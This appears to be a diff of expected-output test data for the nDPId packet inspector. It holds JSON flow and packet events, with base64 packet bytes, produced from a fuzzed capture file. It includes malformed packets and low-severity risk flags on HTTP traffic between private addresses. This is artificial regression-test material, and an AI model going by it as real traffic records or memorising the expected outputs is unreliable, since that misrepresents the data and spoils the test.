00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854543322,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854543322,"pkt":"CAAgsiVzAFCLk5N8CABFAAAoLktAAIAGbkqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854543322,"pkt":"CAAgsiVzAFCLk5N8CABFAAAoLktAAIAGbkqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546078,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546078,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -95,8 +95,8 @@
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMxAAEAGF8WsFAMNrBQDBQBQCi7KxfhE5UFs9mASgyyW7gAAAgQFtA=="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMxAAEAGF8WsFAMNrBQDBQBQCi7KxfhE5UFs9mASgyyW7gAAAgQFtA=="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAoNktAAIAGZkqsFAMFrBQDDQouAFDlQWz2ysX4RVAQIjgPoAAAAgQFtAAA"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAoNktAAIAGZkqsFAMFrBQDDQouAFDlQWz2ysX4RVAQIjgPoAAAAgQFtAAA"}
00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} 00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}}
00369{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854557803,"pkt":"AFCLk5N8kgAgsl2cCAAlcwAoxM5AAEAGF8esFAMNrBQDBQB+Ci7KxfhF5UF0EVAQgyynkAAA"} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854557803,"pkt":"AFCLk5N8kgAgsl2cCAAlcwAoxM5AAEAGF8esFAMNrBQDBQB+Ci7KxfhF5UF0EVAQgyynkAAA"}
00210{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854557899} 00196{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854557899}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854557975,"pkt":"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"} 02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854557975,"pkt":"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"}
00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} 00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}}
@@ -122,8 +122,8 @@
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1031854562490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562490,"pkt":"CAAgsl17AFCLk5N8CABFAAAoREtAAIAGWEqsFAMFrBQDDQBQz5DlW6AhyuQuqFAQHdzk2gAAAgQFtG4v"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1031854562490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562490,"pkt":"CAAgsl17AFCLk5N8CABFAAAoREtAAIAGWEqsFAMFrBQDDQBQz5DlW6AhyuQuqFAQHdzk2gAAAgQFtG4v"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562690,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562690,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562690,"pkt":"AFCLk5N8CAAgsl17CABFAAAobNpAAEAGF7usFEMNrBQDBc+QAFDK5C6o5VOhNFAQgyx+pAAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562690,"pkt":"AFCLk5N8CAAgsl17CABFAAAobNpAAEAGF7usFEMNrBQDBc+QAFDK5C6o5VOhNFAQgyx+pAAA"}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":117,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854562790,"pkt":"CAAgsl17AFCLk5N8DABFJXMATUtAAIAGT0asFAMFrBQDDQowAFDlXnSjAABhAGACIAC1aQAAAgQFtCiq"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":117,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854562790,"pkt":"CAAgsl17AFCLk5N8DABFJXMATUtAAIAGT0asFAMFrBQDDQowAFDlXnSjAABhAGACIAC1aQAAAgQFtCiq"}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":117,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1031854565447} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":117,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1031854565447}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565447,"flow_last_seen":1031854565447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854565447,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565447,"flow_last_seen":1031854565447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854565447,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1031854565447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854565447,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNxAAEQGF7WsFAMNrBQDBQBQCjDK9pOA5V50pGASgyzztQAAAgQFtA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1031854565447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854565447,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNxAAEQGF7WsFAMNrBQDBQBQCjDK9pOA5V50pGASgyzztQAAAgQFtA=="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854565448,"pkt":"CAAgsl17AFCLk5N8CABFAAAoTktAAIAGTkqsFAMFrBQDDQowAFDlXnSkyvaTgVAQIgtsZgAAAgQFtCiq"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854565448,"pkt":"CAAgsl17AFCLk5N8CABFAAAoTktAAIAGTkqsFAMFrBQDDQowAFDlXnSkyvaTgVAQIgtsZgAAAgQFtCiq"}
@@ -133,8 +133,8 @@
